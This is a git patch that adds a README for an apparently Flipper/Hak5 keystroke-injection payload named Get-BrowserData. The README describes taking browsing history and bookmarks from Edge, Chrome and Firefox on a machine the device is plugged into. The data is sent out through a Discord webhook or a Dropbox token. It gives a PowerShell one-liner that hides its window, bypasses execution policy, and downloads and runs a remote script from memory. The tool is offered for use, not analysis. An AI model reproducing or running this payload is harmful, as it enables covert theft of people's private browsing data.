From 627b271532f0eca6f893013b4abf69044aec79d6 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Wed, 21 Dec 2022 18:28:48 -0600 Subject: [PATCH] Create README.md --- Payloads/Flip-BrowserData/README.md | 89 +++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 Payloads/Flip-BrowserData/README.md diff --git a/Payloads/Flip-BrowserData/README.md b/Payloads/Flip-BrowserData/README.md new file mode 100644 index 0000000..1d29ad7 --- /dev/null +++ b/Payloads/Flip-BrowserData/README.md @@ -0,0 +1,89 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. The Function
  4. +
  5. Contact
  6. +
  7. Acknowledgments
  8. +
+
+ +# Get-BrowserData + +

+ + Python + +
YouTube Tutorial +

+ +## Description + +This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) + +They are then exfiled using either discord or dropbox + +## The Function + +### [Get-BrowserData] + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* You no longer need to host your own version of this script +* $db is the variable that holds your DropBox token +* $dc is the variable that holds your Discord webhook +* Fill in either variable or both to set your exfil method + +SYNTAX: + +``` +powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr | iex +``` + + +## Contact + +

📱 My Socials 📱

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [UberGuidoZ](https://github.com/UberGuidoZ)